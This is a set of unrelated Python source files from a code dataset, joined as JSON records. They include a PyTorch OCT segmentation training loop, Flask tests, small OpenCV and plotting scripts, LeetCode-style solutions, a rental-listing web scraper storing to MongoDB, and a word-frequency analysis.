dtype=torch.float32)\n\n if no_class == 2:\n\n labels = labels.to(device=device, dtype=torch.float32)\n\n else:\n\n labels = labels.to(device=device, dtype=torch.long)\n\n outputs_logits = model(images)\n\n optimizer.zero_grad()\n\n # calculate main losses for second time\n if no_class == 2:\n #\n if loss == 'dice':\n #\n main_loss = dice_loss(torch.sigmoid(outputs_logits), labels)\n #\n elif loss == 'ce':\n #\n main_loss = nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels)\n #\n elif loss == 'hybrid':\n #\n main_loss = dice_loss(torch.sigmoid(outputs_logits), labels) + nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels)\n\n else:\n\n # print(outputs_logits.shape)\n\n # print(labels.shape)\n\n main_loss = nn.CrossEntropyLoss(reduction='mean', ignore_index=8)(torch.softmax(outputs_logits, dim=1), labels.squeeze(1))\n\n running_loss += main_loss\n\n main_loss.backward()\n\n optimizer.step()\n\n # ==============================================================================\n # Calculate training and validation metrics at the last iteration of each epoch\n # ==============================================================================\n\n if (j + 1) % iteration_amount == 0:\n\n if no_class == 2:\n\n outputs = torch.sigmoid(outputs_logits)\n\n # outputs = (outputs > 0.5).float()\n\n else:\n\n _, outputs = torch.max(outputs_logits, dim=1)\n\n # outputs = outputs.unsqueeze(1)\n\n labels = labels.squeeze(1)\n\n # print(outputs.shape)\n\n # print(labels.shape)\n\n # mean_iu = segmentation_scores(labels.cpu().detach().numpy(), outputs.cpu().detach().numpy(), no_class)\n\n mean_iu = intersectionAndUnion(outputs.cpu().detach(), labels.cpu().detach(), no_class)\n\n validate_iou, validate_f1, validate_recall, validate_precision = evaluate(data=validate_data, model=model, device=device, class_no=no_class)\n\n # print(validate_iou.type)\n\n print(\n 'Step [{}/{}], '\n 'loss: {:.5f}, '\n 'train iou: {:.5f}, '\n 'val iou: {:.5f}'.format(epoch + 1,\n epochs,\n running_loss / (j + 1),\n mean_iu,\n validate_iou))\n\n writer.add_scalars('scalars', {'train iou': mean_iu,\n 'val iou': validate_iou,\n 'val f1': validate_f1,\n 'val recall': validate_recall,\n 'val precision': validate_precision}, epoch + 1)\n\n else:\n # mix-up strategy requires more calculations:\n\n for j, (images_1, labels_1, imagename_1, images_2, labels_2, mixed_up_image, lam) in enumerate(train_loader):\n\n mixed_up_image = mixed_up_image.to(device=device, dtype=torch.float32)\n lam = lam.to(device=device, dtype=torch.float32)\n\n if no_class == 2:\n labels_1 = labels_1.to(device=device, dtype=torch.float32)\n labels_2 = labels_2.to(device=device, dtype=torch.float32)\n else:\n labels_1 = labels_1.to(device=device, dtype=torch.long)\n labels_2 = labels_2.to(device=device, dtype=torch.long)\n\n outputs_logits = model(mixed_up_image)\n\n optimizer.zero_grad()\n\n # calculate main losses for second time\n if no_class == 2:\n\n if loss == 'dice':\n\n main_loss = lam * dice_loss(torch.sigmoid(outputs_logits), labels_1) + (1 - lam) * dice_loss(torch.sigmoid(outputs_logits), labels_2)\n\n elif loss == 'ce':\n\n main_loss = lam * nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels_1) + (1 - lam) * nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels_2)\n\n elif loss == 'hybrid':\n\n main_loss = lam * dice_loss(torch.sigmoid(outputs_logits), labels_1) \\\n + (1 - lam) * dice_loss(torch.sigmoid(outputs_logits), labels_2) \\\n + lam * nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels_1) \\\n + (1 
- lam) * nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels_2)\n\n elif no_class == 8:\n\n main_loss = lam * nn.CrossEntropyLoss(reduction='mean')(outputs_logits, labels_1.squeeze(1)) + (1 - lam) * nn.CrossEntropyLoss(reduction='mean')(outputs_logits, labels_2.squeeze(1))\n\n else:\n main_loss = lam * nn.CrossEntropyLoss(reduction='mean')(outputs_logits, labels_1.squeeze(1)) + (1 - lam) * nn.CrossEntropyLoss(reduction='mean')(outputs_logits, labels_2.squeeze(1))\n\n running_loss += main_loss.mean()\n\n main_loss.mean().backward()\n\n optimizer.step()\n\n # ==============================================================================\n # Calculate training and validation metrics at the last iteration of each epoch\n # ==============================================================================\n if (j + 1) % iteration_amount == 0:\n\n if no_class == 2:\n\n outputs = torch.sigmoid(outputs_logits)\n\n else:\n\n _, outputs = torch.max(outputs_logits, dim=1)\n\n outputs = outputs.unsqueeze(1)\n\n mean_iu_1 = segmentation_scores(labels_1.cpu().detach().numpy(), outputs.cpu().detach().numpy(), no_class)\n\n mean_iu_2 = segmentation_scores(labels_2.cpu().detach().numpy(), outputs.cpu().detach().numpy(), no_class)\n\n mean_iu = lam.data.sum() * mean_iu_1 + (1 - lam.data.sum()) * mean_iu_2\n\n validate_iou, validate_f1, validate_recall, validate_precision = evaluate(data=validate_data, model=model, device=device, class_no=no_class)\n\n mean_iu = mean_iu.item()\n\n print(\n 'Step [{}/{}], '\n 'loss: {:.4f}, '\n 'train iou: {:.4f}, '\n 'val iou: {:.4f}'.format(epoch + 1,\n epochs,\n running_loss / (j + 1),\n mean_iu,\n validate_iou))\n\n writer.add_scalars('scalars', {'train iou': mean_iu,\n 'val iou': validate_iou,\n 'val f1': validate_f1,\n 'val recall': validate_recall,\n 'val precision': validate_precision}, epoch + 1)\n\n if lr_scedule is True:\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr*((1 - epoch / epochs)**0.999)\n\n # save model\n save_folder = '../../saved_models_' + log\n\n try:\n\n os.makedirs(save_folder)\n\n except OSError as exc:\n\n if exc.errno != errno.EEXIST:\n\n raise\n pass\n\n save_model_name = model_name + '_Final'\n\n save_model_name_full = save_folder + '/' + save_model_name + '.pt'\n\n torch.save(model, save_model_name_full)\n # =======================================================================\n # testing (disabled during training, because it is too slow)\n # =======================================================================\n save_results_folder = save_folder + '/testing_results_' + model_name\n\n try:\n os.makedirs(save_results_folder)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n pass\n\n test_iou_1, test_f1_1, test_recall_1, test_precision_1, mse_1, test_iou_2, test_f1_2, test_recall_2, test_precision_2, mse_2, outputs_1, outputs_2 = test(data_1=test_data_1,\n data_2=test_data_2,\n model=model,\n device=device,\n class_no=no_class,\n save_location=save_results_folder)\n\n print(\n 'test iou data 1: {:.4f}, '\n 'test mse data 1: {:.4f}, '\n 'test f1 data 1: {:.4f},'\n 'test recall data 1: {:.4f}, '\n 'test precision data 1: {:.4f}, '.format(test_iou_1,\n mse_1,\n test_f1_1,\n test_recall_1,\n test_precision_1))\n\n print(\n 'test iou data 2: {:.4f}, '\n 'test mse data 2: {:.4f}, '\n 'test f1 data 2: {:.4f},'\n 'test recall data 2: {:.4f}, '\n 'test precision data 2: {:.4f}, '.format(test_iou_2,\n mse_2,\n test_f1_2,\n test_recall_2,\n test_precision_2))\n\n print('\\nTesting finished and results 
saved.\\n')\n\n return save_model_name_full\n\n\n","sub_path":"OCT_train.py","file_name":"OCT_train.py","file_ext":"py","file_size_in_byte":24771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"141175424","text":"\nimport json\n\nfrom client import TestCase\nfrom fixtures_states import data as states\nfrom fixtures_companies import data as companies\nfrom fixtures_labs import data as labs\nfrom fixtures_sites import data as sites\nfrom fixtures_substance_groups import data as substance_groups\nfrom fixtures_substances import data as substances\nfrom fixtures_wells import data as wells\nfrom fixtures_schedules import data as schedules\nfrom fixtures_samples import data as samples\nfrom fixtures_sample_values import data as sample_values\n\nfrom sampleserve.core import db\nfrom sampleserve.users.models import (\n Company,\n Lab,\n)\nfrom sampleserve.substances.models import State\nfrom sampleserve.sites.models import (\n Site,\n Schedule,\n)\nfrom sampleserve.substances.models import (\n SubstanceGroup,\n Substance,\n)\nfrom sampleserve.wells.models import Well\nfrom sampleserve.samples.models import (\n Sample,\n SampleValue,\n)\n\n\nclass SamplesTestCase(TestCase):\n def setUp(self):\n with self.app.app_context():\n for row in labs:\n db.session.add(Lab(*row))\n\n db.session.commit()\n\n for row in companies:\n db.session.add(Company(*row))\n\n db.session.commit()\n\n for row in states:\n db.session.add(State(*row))\n\n db.session.commit()\n\n for row in sites:\n db.session.add(Site(*row))\n\n db.session.commit()\n\n for row in substance_groups:\n db.session.add(SubstanceGroup(*row))\n\n db.session.commit()\n\n for row in substances:\n db.session.add(Substance(*row))\n\n for row in wells:\n db.session.add(Well(*row))\n\n for row in schedules:\n db.session.add(Schedule(*row))\n\n db.session.commit()\n\n for row in samples:\n db.session.add(Sample(*row))\n\n db.session.commit()\n\n for row in sample_values:\n db.session.add(SampleValue(*row))\n\n db.session.commit()\n\n def test_index(self):\n rv = self.client.get('/api/v1/samples/', base_url='http://test.sampleserve.dev')\n assert rv.status_code == 200\n\n def test_create_incomplete(self):\n rv = self.post('/api/v1/samples/', {'title': 'Test'}, base_url='http://test.sampleserve.dev')\n assert rv.status_code == 422\n\n def test_show(self):\n rv = self.client.get('/api/v1/samples/3', base_url='http://test.sampleserve.dev')\n assert rv.status_code == 200\n\n def test_edit(self):\n rv = self.patch('/api/v1/samples/3', {'active': False}, base_url='http://test.sampleserve.dev')\n assert rv.status_code == 200\n data = json.loads(rv.data)\n assert data['active'] == False\n\n def test_delete(self):\n rv = self.client.delete('/api/v1/samples/3', base_url='http://test.sampleserve.dev')\n assert rv.status_code == 204\n","sub_path":"tests/test_samples.py","file_name":"test_samples.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"464558191","text":"#\n# @lc app=leetcode id=1344 lang=python\n#\n# [1344] Angle Between Hands of a Clock\n#\n\n# @lc code=start\n\nclass Solution:\n def angleClock(self, hour: int, minutes: int) -> float:\n minuteAngle = 6 * minutes\n hourAngle = (hour % 12) * 30 + (minutes/60 * 30)\n result = abs(minuteAngle - hourAngle) % 360\n inverse = 360 - result\n return result if result < inverse else inverse\n\n# @lc 
code=end\n","sub_path":"Leetcode/1344.angle-between-hands-of-a-clock.py","file_name":"1344.angle-between-hands-of-a-clock.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"225515066","text":"#coding:utf-8\n\npermis=list(range(30000,100000))\nprint(permis)\n\npermis2=list(range(0,10))\n\npermis3=list(range(10,100))\n\npermis4=list(range(100,1000))\n\npermis5=list(range(1000,10000))\n\npermis6=list(range(10000,18000))\n# print(permis+permis2+permis3+permis4+permis5+permis6)\n\nfor permi in permis:\n    print('{}'.format(permi))\n\nfor permi2 in permis2:\n    print('0000{}'.format(permi2))\n    \nfor permi3 in permis3:\n    print('000{}'.format(permi3))\n    \nfor permi4 in permis4:\n    print('00{}'.format(permi4))\n    \nfor permi5 in permis5:\n    print('0{}'.format(permi5))\n    \nfor permi6 in permis6:\n    print('{}'.format(permi6))\n\n# Clever solution, but a shorter script is possible.\n# Here is one of my suggestions:\n\nfor a in range(1930,2018): # Loop over every year from 1930 to 2017\n\tfor x in range(1001,2000): # Loop over the 1000 possible permit numbers for each year\n\t# Then print a string assembled from:\n\t# First, convert the year to a string and keep only its last two characters\n\t# Then also convert the numbers generated by the second loop (1000 to 1999) to strings, keeping only their last three characters\n\t\tprint(str(a)[2:] + str(x)[1:])","sub_path":"devoir1JHR.py","file_name":"devoir1JHR.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"438804421","text":"from flask import Flask\n\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/<name>')\n
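# index() falls back to 'world' when the optional name segment is omitted.\n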

Hello {}

\n \n\n \"\"\".format(name)\n\n\napp.run(debug=True)\n","sub_path":"treehouse/basics/html/flat_html.py","file_name":"flat_html.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"489031886","text":"\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nfile = \"Images/hair1.jpg\"\n\n# Reading the image\nimg = cv2.imread(file)\n\n# converted into RGB colors\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\nimgGray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n#Convert two D image into 3 D\nimgGray= cv2.cvtColor(imgGray, cv2.COLOR_GRAY2RGB)\n\n\n# Negative Image\nimgInv= cv2.bitwise_not(img)\n\n# Flips image\nimgflip= cv2.flip(img,0) # 0 for vertical flip and 1 for horizontal flip\n\n\nplt.subplot(141)\nplt.imshow(img)\nplt.title(\"Original\")\n\nplt.subplot(142)\nplt.imshow(imgGray)\nplt.title(\"gray\")\n\nplt.subplot(143)\nplt.imshow(imgInv)\nplt.title(\"invert\")\n#\nplt.subplot(144)\nplt.imshow(imgflip)\nplt.title(\"Flip\")\n\n\nplt.show()\n\n\n\n# Wait until any key is pressed\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","sub_path":"ImageOperations/GrayInvert.py","file_name":"GrayInvert.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"531891015","text":"import os\n\ndef Question45():\n try:\n read_file = open(os.getcwd()+\"/Chapter08/Question45_example.txt\", 'r')\n file_str = read_file.read()\n read_file.close()\n \n print(\"Input file string : \")\n print(file_str, end=\"\\n\\n\")\n \n count = file_str.count(\"utilize\")\n print(\"Input file \\\"use\\\" string count : {0:d}\".format(count), end=\"\\n\\n\")\n \n print(\"Output file string : \")\n re_file_str = file_str.replace(\"utilize\", \"use\")\n print(re_file_str)\n \n write_file = open(os.getcwd()+\"/Chapter08/Question45_result.txt\", 'w')\n write_file.write(re_file_str) \n write_file.close()\n except IOError as err:\n print(err)\n \n ","sub_path":"CodingTraining/PythonStudy/Chapter08/Question45.py","file_name":"Question45.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"277414521","text":"#!/usr/bin/env python\n# Ben's scratchpad for testing\n\n## Imports\nimport os\nimport pandas as pd\nimport yellowbrick as yb\nimport matplotlib.pyplot as plt\n\nfrom pandas.tools.plotting import radviz, parallel_coordinates\nfrom yellowbrick.features import ParallelCoordinates, RadViz, Rank2D\n\n## Module Constants - the path to the test data sets\nFIXTURES = os.path.join(os.path.dirname(__file__), \"examples\", \"data\")\n\n## Dataset loading mechanisms\ndatasets = {\n \"credit\": os.path.join(FIXTURES, \"credit.xls\"),\n \"concrete\": os.path.join(FIXTURES, \"concrete.xls\"),\n \"occupancy\": os.path.join(FIXTURES, 'occupancy', 'datatraining.txt'),\n}\n\n## Human readable column names\ncolumns = {\n \"credit\": [\n 'id', 'limit', 'sex', 'edu', 'married', 'age', 'apr_delay', 'may_delay',\n 'jun_delay', 'jul_delay', 'aug_delay', 'sep_delay', 'apr_bill', 'may_bill',\n 'jun_bill', 'jul_bill', 'aug_bill', 'sep_bill', 'apr_pay', 'may_pay', 'jun_pay',\n 'jul_pay', 'aug_pay', 'sep_pay', 'default'\n ],\n \"concrete\": [\n 'cement', 'slag', 'ash', 'water', 'splast',\n 'coarse', 'fine', 'age', 'strength'\n ],\n \"occupancy\": [\n 'date', 'temp', 'humid', 'light', 'co2', 'hratio', 'occupied'\n ],\n}\n\n\ndef load_data(name):\n \"\"\"\n Loads and 
wrangles the passed in dataset.\n \"\"\"\n\n path = datasets[name]\n data = {\n 'credit': lambda p: pd.read_excel(p, header=1),\n 'concrete': lambda p: pd.read_excel(p),\n 'occupancy': lambda p: pd.read_csv(p),\n }[name](path)\n\n data.columns = columns[name]\n return data\n\n\ndef test_parallel_coords(pandas=False, outpath=None):\n \"\"\"\n Runs the parallel coordinates visualizer on the dataset.\n\n Parameters\n ----------\n pandas : bool\n Run the pandas version of the function\n outpath : path or None\n Save the figure to disk rather than show (if None)\n \"\"\"\n data = load_data('occupancy') # Load the data\n features = ['temp', 'humid', 'light', 'co2', 'hratio']\n classes = ['unoccupied', 'occupied']\n X = data[features].as_matrix()\n y = data.occupied.as_matrix()\n\n if pandas:\n parallel_coordinates(data[features + ['occupied']], 'occupied')\n if outpath:\n plt.savefig(outpath)\n else:\n plt.show()\n\n else:\n visualizer = ParallelCoordinates( # Instantiate the visualizer\n classes=classes, features=features\n )\n visualizer.fit(X, y) # Fit the data to the visualizer\n visualizer.transform(X) # Transform the data\n visualizer.poof(outpath=outpath) # Draw/show/poof the data\n\n\ndef test_radviz(pandas=False, outpath=None):\n \"\"\"\n Runs the radviz visualizer on the dataset.\n\n Parameters\n ----------\n pandas : bool\n Run the pandas version of the function\n outpath : path or None\n Save the figure to disk rather than show (if None)\n \"\"\"\n data = load_data('occupancy') # Load the data\n features = ['temp', 'humid', 'light', 'co2', 'hratio']\n classes = ['unoccupied', 'occupied']\n X = data[features].as_matrix()\n y = data.occupied.as_matrix()\n\n if pandas:\n radviz(data[features + ['occupied']], 'occupied')\n if outpath:\n plt.savefig(outpath)\n else:\n plt.show()\n\n else:\n visualizer = RadViz( # Instantiate the visualizer\n classes=classes, features=features\n )\n visualizer.fit(X, y) # Fit the data to the visualizer\n visualizer.transform(X) # Transform the data\n visualizer.poof(outpath=outpath) # Draw/show/poof the data\n\n\ndef test_rank2d(seaborn=False, outpath=None):\n \"\"\"\n Runs the Rank2D visualizer on the dataset.\n\n Parameters\n ----------\n seaborn : bool\n Run the seaborn version of the function\n outpath : path or None\n Save the figure to disk rather than show (if None)\n \"\"\"\n data = load_data('occupancy') # Load the data\n features = ['temp', 'humid', 'light', 'co2', 'hratio']\n classes = ['unoccupied', 'occupied']\n X = data[features].as_matrix()\n y = data.occupied.as_matrix()\n\n if seaborn:\n raise NotImplementedError(\"Not yet!\")\n\n else:\n visualizer = Rank2D(features=features, algorithm='covariance')\n visualizer.fit(X, y) # Fit the data to the visualizer\n visualizer.transform(X) # Transform the data\n visualizer.poof(outpath=outpath) # Draw/show/poof the data\n\n\nif __name__ == '__main__':\n # test_parallel_coords(pandas=True)\n # test_radviz(pandas=False, outpath='/Users/benjamin/Desktop/yb_radviz.png')\n test_rank2d(outpath='/Users/benjamin/Desktop/yb_rank2d_covariance.png')\n","sub_path":"examples/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"57305906","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom os import path\nfrom wordcloud import WordCloud, ImageColorGenerator\nimport jieba.analyse\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread\nimport time\nfrom pymongo import 
MongoClient\n\n\n\nclass HouseSpider:\n def __init__(self):\n self.client = MongoClient('mongodb://localhost:27017/')\n self.zfdb = self.client.zfdb\n self.zfdb.authenticate(\"admin\", \"123456\")\n\n session = requests.Session()\n baseUrl = \"http://zu.fang.com\"\n\n urlDir = {\n \"不限\": \"/house/\",\n \"朝阳\": \"/house-a01/\",\n \"海淀\": \"/house-a00/\",\n \"丰台\": \"/house-a06/\",\n \"东城\": \"/house-a02/\",\n \"西城\": \"/house-a03/\",\n \"石景山\": \"/house-a07/\",\n \"昌平\": \"/house-a012/\",\n \"大兴\": \"/house-a0585/\",\n \"通州\": \"/house-a010/\",\n \"顺义\": \"/house-a011/\",\n \"房山\": \"/house-a08/\",\n \"密云\": \"/house-a013/\",\n \"门头沟\":\"/house-a09/\",\n \"怀柔\":\"/house-a014/\",\n \"延庆\":\"/house-a015/\",\n \"平谷\":\"/house-a016/\",\n \"燕郊\":\"/house-a0987/\",\n \"北京周边\": \"/house-a011817/\",# Xianghe, Dachang, Gu'an, etc.\n }\n region = \"不限\"\n page = 100\n # Build the list of page urls for a given district name\n def getRegionUrl(self, name=\"朝阳\", page=10):\n urlList = []\n for index in range(page):\n if index == 0:\n urlList.append(self.baseUrl + self.urlDir[name])\n else:\n urlList.append(self.baseUrl + self.urlDir[name] + \"i3\" + str(index + 1) + \"/\")\n\n return urlList\n\n\n # MongoDB document structure\n def getRentMsg(self, title, rooms, area, price, address, traffic, region, direction):\n return {\n \"title\": title, # title\n \"rooms\": rooms, # number of rooms\n \"area\": area, # floor area in square meters\n \"price\": price, # price\n \"address\": address, # address\n \"traffic\": traffic, # transit description\n \"region\": region, # district (e.g. Futian, Nanshan)\n \"direction\": direction, # orientation of the flat (south-facing, north-south, ...)\n }\n\n # Get the MongoDB collection for a district\n def getCollection(self, name):\n zfdb = self.zfdb\n if name == \"不限\":\n return zfdb.rent_bj\n if name == \"朝阳\":\n return zfdb.cy_bj\n if name == \"海淀\":\n return zfdb.hd_bj\n if name == \"丰台\":\n return zfdb.ft_bj\n if name == \"东城\":\n return zfdb.dc_bj\n if name == \"西城\":\n return zfdb.xc_bj\n if name == \"石景山\":\n return zfdb.sjs_bj\n if name == \"昌平\":\n return zfdb.cp_bj\n if name == \"通州\":\n return zfdb.tz_bj\n if name == \"顺义\":\n return zfdb.sy_bj\n if name == \"大兴\":\n return zfdb.dx_bj\n if name == \"房山\":\n return zfdb.fs_bj\n if name == \"门头沟\":\n return zfdb.mtg_bj\n if name == \"密云\":\n return zfdb.my_bj\n if name == \"延庆\":\n return zfdb.yq_bj\n if name == \"怀柔\":\n return zfdb.hr_bj\n if name == \"平谷\":\n return zfdb.pg_bj\n if name == \"燕郊\":\n return zfdb.yj_bj\n\n\n def getOnePageData(self, pageUrl, region=\"不限\"):\n rent = self.getCollection(self.region)\n self.session.headers.update({\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36'})\n res = self.session.get(\n pageUrl\n )\n soup = BeautifulSoup(res.text, \"html.parser\")\n divs = soup.find_all(\"dd\", attrs={\"class\": \"info rel\"}) # Get the divs that need to be scraped\n for div in divs:\n ps = div.find_all(\"p\")\n try: # Catch exceptions: some listings are incomplete or an ad was inserted, so the expected tags are missing and an error is raised\n for index, p in enumerate(ps): # From the page source, every p tag holds information we want, so iterate over the p tags\n text = p.text.strip()\n print(text) # Print to check whether this is the information we want\n print(\"===================================\")\n # Scrape and store into the MongoDB database\n roomMsg = ps[1].text.split(\"|\")\n # rentMsg is built this way because some fields are incomplete and would otherwise be null\n area = roomMsg[2].strip()[:len(roomMsg[2]) - 2]\n rentMsg = self.getRentMsg(\n ps[0].text.strip(),\n roomMsg[1].strip(),\n int(float(area)),\n int(ps[len(ps) - 1].text.strip()[:len(ps[len(ps) - 1].text.strip()) - 3]),\n ps[2].text.strip(),\n ps[3].text.strip(),\n ps[2].text.strip()[:2],\n roomMsg[3],\n )\n rent.insert(rentMsg)\n except:\n continue\n\n\n def setRegion(self, region):\n self.region = region\n\n def setPage(self, page):\n self.page = page\n\n def startSpider(self):\n for url in self.getRegionUrl(self.region, self.page):\n self.getOnePageData(url, self.region)\n print(\"=================== one page divider ===========================\")\n print(\"=================== one page divider ===========================\")\n print(\"=================== one page divider ===========================\")\n time.sleep(5)\n\n\nspider = HouseSpider()\nspider.setPage(10)# set the number of pages to scrape\nspider.setRegion(\"燕郊\")# set the district to scrape\nspider.startSpider()# start the spider\n","sub_path":"houseSpyderBJ.py","file_name":"houseSpyderBJ.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"410572462","text":"import os\nimport re\nimport collections\nimport csv\n\nTOTAL_WORDS = 0\n\n\ndef order_text(directory):\n \"\"\"\n :return: text without punctuation or numbers\n \"\"\"\n\n text = \"\"\n\n for i in os.listdir(directory):\n text = text + \" \"\n if i.endswith(\".txt\"):\n f = open(os.path.join(directory, i), 'r', 
encoding=\"utf-8\")\n text = text + f.read()\n f.close()\n\n clean = re.compile('<.*?>')\n remove = \"!\\\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~0123456789«»–·\"\n\n text = re.sub(clean, '', text)\n tr = str.maketrans(\"\", \"\", remove)\n text = text.lower()\n\n return text.translate(tr)\n\n\ndef top_word_frequencies(text, top):\n \"\"\"\n :param text: refined text from web crawl free from punctuation and numbers\n :param top: number of top word frequencies to return\n :return: a list of tuples with the most frequent words and their frequencies in descending order\n \"\"\"\n\n words = text.split()\n global TOTAL_WORDS\n TOTAL_WORDS = len(words)\n word_frequencies = collections.Counter(words)\n top_words = word_frequencies.most_common(top)\n\n return top_words\n\n\ndef generate_zipf_data(frequencies):\n \"\"\"\n :param frequencies: ordered list of tuples containing the word and frequency\n :return:\n \"\"\"\n zipf_data = []\n\n for i in frequencies:\n if isinstance(i[0], str):\n probability = i[1] / TOTAL_WORDS\n\n zipf_data.append({\"word\": i[0],\n \"frequency\": i[1],\n \"probability of occurrence\": probability})\n \n return zipf_data\n\n\ndef print_data(zip_file, file_name):\n with open(file_name, \"w\", encoding=\"utf-8\") as outfile:\n for entries in zip_file:\n for key in entries.keys():\n outfile.write(\"%s,\" % (entries[key]))\n outfile.write(\"\\n\")\n\n","sub_path":"src/zipf_analysis/zipfslaw.py","file_name":"zipfslaw.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"390791839","text":"# 풀이참고\nfrom bisect import bisect_left\n\nn = int(input())\nvalue = list(map(int, input().split()))\n\nstack = [0] # 비교하기 위해 0 넣어줌\n\nfor a in value:\n if stack[-1] < a:\n stack.append(a)\n else:\n stack[bisect_left(stack, a)] = a # a가 들어갈 위치에 a를 넣어준다.\n # a가 들어갈 위치랑 a랑 값이 다를 수 있지만 가장 긴 증가하는 부분 수열의 길이를 구하기 때문에 stack안에 값은 별로 상관없다.\n\nprint(len(stack)-1) # 0빼야함","sub_path":"8주차 이분탐색,그래프/가장긴증가하는부분수열2/김승욱.py","file_name":"김승욱.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"72364755","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[9]:\n\n\nimport cv2, numpy as np\n\n\n# In[10]:\n\n\nimage=cv2.imread('./data/lena.png')\n\n\n# In[11]:\n\n\nimage_to_show=np.copy(image)\n\n\n# In[12]:\n\n\nmouse_pressed=False\n\n\n# In[13]:\n\n\ns_x=s_y=e_x=e_y=-1\n\n\n# In[14]:\n\n\ndef mouse_callback(event, x, y, flags, param):\n global image_to_show,s_x,s_y,e_x,e_y,mouse_pressed\n \n if event==cv2.EVENT_LBUTTONDOWN:\n mouse_pressed=True\n s_x,s_y=x,y\n image_to_show=np.copy(image)\n print(\"event button down: \",s_x,s_y)\n \n elif event==cv2.EVENT_MOUSEMOVE:\n if mouse_pressed:\n image_to_show=np.copy(image)\n cv2.rectangle(image_to_show, (s_x, s_y), (x,y),(0,255,0),1)\n \n elif event==cv2.EVENT_LBUTTONUP:\n mouse_pressed=False\n e_x,e_y=x,y\n print(\"event button up: \", e_x,e_y)\n\n\n# In[15]:\n\n\ncv2.namedWindow('image')\ncv2.setMouseCallback('image', mouse_callback)\n\n\n# In[8]:\n\n\nwhile True:\n cv2.imshow('image', image_to_show)\n k=cv2.waitKey(1)\n if k==ord('c'):\n if s_y > e_y:\n s_y, e_y=e_y, s_y\n if s_x > e_x:\n s_x,e_x=e_x,s_x\n if e_y-s_y >1 and e_x-s_x>0:\n image=image[s_y:e_y,s_x:e_x]\n image_to_show=np.copy(image)\n elif k==27:\n break\n \ncv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Basics/Reading Images and 
Videos/Handling_user_input.py","file_name":"Handling_user_input.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"264933062","text":"import os, sys, gc, copy, itertools, json\nfrom yaml import load\n\nsys.path.append(\"src\")\nfrom train_model import train_model\nfrom model_analysis import model_analysis, torch_confusion_matrix, plot_confusion_matrix\nfrom plot_images import torch_to_PIL_single_image, ims_labels_to_grid, ims_preds_to_grid, ims_labels_preds_to_grid\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import precision_recall_fscore_support\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom torchvision import transforms, utils, models\nfrom torchvision.utils import make_grid\n\nfrom tensorboardX import SummaryWriter\n\nfrom sklearn.metrics import precision_recall_curve\nfrom itertools import cycle\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom PIL import Image, ImageDraw, ImageFont\nfrom IPython.core.display import display\n\nfrom pytorch_learning_tools.data_providers.DataframeDataProvider import DataframeDataProvider\nfrom pytorch_learning_tools.data_providers.DataframeDataset import DatasetSingleRGBImageToTarget, \\\n DatasetSingleRGBImageToTargetUniqueID\nfrom pytorch_learning_tools.utils.dataframe_utils import filter_dataframe\nfrom pytorch_learning_tools.utils.data_utils import classes_and_weights\n\nimport seaborn as sns\nimport collections\nimport pickle\nfrom models.irena_classification import IrenaClassification\nfrom sqlalchemy import create_engine\n\n\n\n\nclass MitosisClassifier(object):\n \"\"\"This is a script to automate the running of the mitotic program\n\n Attributes:\n\n\n \"\"\"\n\n def __init__(self, base_path, iter_n=0, f_label='mitosis_label'):\n self.GPU_ID = 1\n self.BATCH_SIZE = 64\n self.base_path = base_path\n self.iter_n = iter_n\n self.greg_data = 